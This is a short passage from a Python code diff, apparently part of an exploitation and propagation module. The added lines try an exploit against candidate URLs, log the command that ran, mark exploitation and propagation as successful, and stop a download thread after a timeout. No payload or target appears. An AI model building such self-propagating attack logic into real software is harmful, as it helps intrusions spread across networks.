potential_urls: + if self.exploit(url, command): + self.add_executed_cmd(command) + self.exploit_result.exploitation_success = True + self.exploit_result.propagation_success = True + break finally: http_thread.join(self.DOWNLOAD_TIMEOUT) http_thread.stop()